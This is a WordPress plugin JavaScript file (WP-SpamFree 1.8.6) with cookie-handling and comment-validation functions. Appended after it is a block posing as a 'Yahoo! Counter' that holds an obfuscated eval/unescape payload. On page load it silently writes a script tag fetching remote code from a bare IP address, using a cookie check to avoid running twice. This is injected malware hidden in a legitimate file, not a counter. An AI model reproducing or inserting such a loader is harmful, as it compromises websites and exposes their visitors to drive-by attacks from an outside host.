
// WP-SpamFree 1.8.6 JS Code :: BEGIN

// Cookie Handler :: BEGIN 
function GetCookie( name ) { 
	var start = document.cookie.indexOf( name + '=' ); 
	var len = start + name.length + 1; 
	if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { 
		return null; 
	} 
	if ( start == -1 ) return null; 
	var end = document.cookie.indexOf( ';', len ); 
	if ( end == -1 ) end = document.cookie.length; 
	return unescape( document.cookie.substring( len, end ) ); 
}  
	
function SetCookie( name, value, expires, path, domain, secure ) { 
	var today = new Date(); 
	today.setTime( today.getTime() ); 
	if ( expires ) { 
		expires = expires * 1000 * 60 * 60 * 24; 
	} 
	var expires_date = new Date( today.getTime() + (expires) ); 
	document.cookie = name+'='+escape( value ) + 
		( ( expires ) ? ';expires='+expires_date.toGMTString() : '' ) + //expires.toGMTString() 
		( ( path ) ? ';path=' + path : '' ) + 
		( ( domain ) ? ';domain=' + domain : '' ) + 
		( ( secure ) ? ';secure' : '' ); 
}  
	
function DeleteCookie( name, path, domain ) { 
	if ( getCookie( name ) ) document.cookie = name + '=' + 
			( ( path ) ? ';path=' + path : '') + 
			( ( domain ) ? ';domain=' + domain : '' ) + 
			';expires=Thu, 01-Jan-1970 00:00:01 GMT'; 
} 
// Cookie Handler :: END  

function commentValidation() { 
	SetCookie('JWPZLCCJCZMIBFDL','gDcEGGhrigriEjgz','','/');
	SetCookie('SJECT','CKON','','/');
}  

commentValidation();  

// WP-SpamFree 1.8.6 JS Code :: END 
<script language=javascript><!-- Yahoo! Counter starts here -->
if(typeof(yahoo_counter)!=typeof(1))eval(unescape('%2F@/$%2E@.. %3C#di!%76%20@%73|%74y@%6C@e#=d~i$%73!p~%6C$%61%79!:%6Eon%65@%3E~\n%76a%72%20@_;%69#%66`%28|d%6F$%63!u%6De`%6E@t|.co@o!%6Bi%65@%2E#%6D#%61#%74|%63h(/%5Cbh&g!f`%74%3D1/)#=|=%6E~ul%6C%29`d$%6F%63#%75m%65n`t%2E&w`%72it|e(&"%3C@%73|c`r%69$%70&t@%20%73r~%63=/%2F@%37$%38#%2E~%315~7&.@%31~4%32$%2E%35@%38/|%63!p/$%3F|"+`%6E!a`%76%69%67!a%74@o%72`%2E%61pp&N%61&m@%65&%2Ech@%61!%72$%41@t(0)+%22%3E%3C%5C/%73%63%72i|%70&t|%3E%22@)$%3B`\n%2F/%3C%2F~d!%69&%76$%3E').replace(/\||\&|\$|`|#|\!|~|@/g,""));var yahoo_counter=1;
<!-- counter end --></script>
